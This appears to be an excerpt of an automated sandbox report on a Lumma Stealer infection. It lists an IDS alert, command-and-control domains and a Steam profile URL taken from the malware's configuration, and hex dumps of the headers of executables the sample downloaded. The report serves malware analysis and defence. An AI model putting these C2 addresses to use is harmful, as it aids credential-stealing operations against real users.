Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:53640 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: isoplethui.sbs
Source: Malware configuration extractor	URLs: frizzettei.sbs
Source: Malware configuration extractor	URLs: laddyirekyi.sbs
Source: Malware configuration extractor	URLs: invinjurhey.sbs
Source: Malware configuration extractor	URLs: bemuzzeki.sbs
Source: Malware configuration extractor	URLs: exilepolsiy.sbs
Source: Malware configuration extractor	URLs: exemplarou.sbs
Source: Malware configuration extractor	URLs: wickedneatr.sbs
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199780418869

Detected non-DNS traffic on DNS port

Source: global traffic

TCP traffic: 192.168.2.4:51630 -> 162.159.36.2:53

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:27 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 25 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 db 23 00 f1 36 00 00 9c a2 24 00 28 00 00 00 00 d0 24 00 cc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 24 00 88 e2 00 00 60 b2 23 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b1 23 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 24 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 47 d3 20 00 00 10 00 00 00 d4 20 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 91 22 03 00 00 f0 20 00 00 24 03 00 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 7c 00 00 00 20 24 00 00 62 00 00 00 fc 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b4 10 00 00 00 a0 24 00 00 12 00 00 00 5e 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 0e 01 00 00 00 c0 24 00 00 02 00 00 00 70 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 cc 12 00 00 00 d0 24 00 00 14 00 00 00 72 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 35 ff 00 00 00 f0 24 00 00 00 01 00 00 86 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:34 GMTContent-Type: application/octet-streamContent-Length: 685392Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-a7550"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:35 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:35 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:36 GMTContent-Type: application/octet-streamContent-Length: 450024Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-6dde8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:37 GMTContent-Type: application/octet-streamContent-Length: 257872Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-3ef50"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:37 GMTContent-Type: application/octet-streamContent-Length: 80880Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-13bf0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
